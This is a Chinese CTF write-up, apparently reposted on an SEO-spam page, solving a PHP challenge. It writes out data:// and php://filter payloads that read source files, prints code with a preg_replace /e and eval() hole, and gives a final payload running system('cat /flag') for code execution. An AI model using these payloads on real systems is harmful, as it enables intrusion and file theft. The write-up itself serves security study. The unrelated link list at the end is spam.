当前位置: 首页 > news >正文

做网站漯河搜索引擎优化目标

做网站漯河,搜索引擎优化目标,网站高端网站建设,短视频素材免费1、点开连接,页面出现了提示 传入一个参数text,里面的内容要包括I have a dream。 构造:?/textI have a dream。发现页面没有显示。这里推测可能得使用伪协议 在文件包含那一行,我们看到了next.php的提示,我们尝试读取…

1、点开连接,页面出现了提示

传入一个参数text,里面的内容要包括I have a dream。

构造:?/text=I have a dream。发现页面没有显示。这里推测可能得使用伪协议

在文件包含那一行,我们看到了next.php的提示,我们尝试读取文件

根据代码:我们构造payload

/?text=data://text/plain,I have a dream&file=php://filter/convert.base64-encode/resource=next.php

2、页面出现base64编码

 

3、解码之后得到一串代码

<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;function complex($re, $str) {return preg_replace('/(' . $re . ')/ei','strtolower("\\1")',$str);
}foreach($_GET as $re => $str) {echo complex($re, $str). "\n";
}function getFlag(){@eval($_GET['cmd']);
}

4、分析代码:

 定义了一个名为 complex 的函数,用于对字符串进行正则替换操作。具体来说,它会将匹配到的字符串转换为小写。

/ei:当作php代码来执行,忽略大小写

定义了一个getFlag函数,将参数cmd中的参数输出

5、由此我们可以构造新payload

/?text=data://text/pain,I have a dream&file=next.php&\S*=${getFlag()}&cmd=system('cat /flag');

使用正则表达式匹配一个或多个非空白字符(\S*),然后将其赋值给一个变量。

http://www.yidumall.com/news/100971.html

相关文章:

  • 电子商务网站建设总结产品质量推广营销语
  • 网站托管维护合同公众号软文推广
  • 环球设计网站百度营稍
  • code编程网站搜索引擎seo关键词优化
  • eclipse 网站开发源码关键词搜索工具
  • 培训网站图片semir森马
  • 淘宝店的网站建设分析推销
  • 我想阻止一个网站要怎么做怎么推广一个产品
  • 网站实现步骤及方法网站卖链接
  • 塘厦网站建设公司百度学术论文查重免费检测
  • 如何开网站企业自建网站
  • 网站建设模式有哪些内容宁波seo优化排名
  • 小网站asp好还是php好百度秒收录软件工具
  • 佛山选择免费网站优化免费seo网站推荐一下
  • 手机棋牌网站大全店铺运营方案策划
  • 网站建设学习泉州百度seo公司
  • 网站开发合同免费模板排名seo公司
  • 做网站开发欧美seo查询
  • 地方门户网站建设方案百度应用app
  • 兰州做网站咨询兰州做网站公司合肥网络推广服务
  • 给老外做代购网站免费二级域名建站
  • 上海网站建设雍熙世界最新新闻
  • 武汉网站公司多少钱如何进行网站的推广
  • 广州建设网站的公司免费的网站软件
  • 网易做的什么网站线上渠道推广怎么做
  • 湖南长沙旅游攻略windows10优化大师
  • 对用户1万的网站做性能测试搜索关键词的方法
  • 网站转化肇庆百度快速排名
  • 电商线上推广渠道佛山网站优化
  • 申请域名建立网站宁波网站优化公司哪家好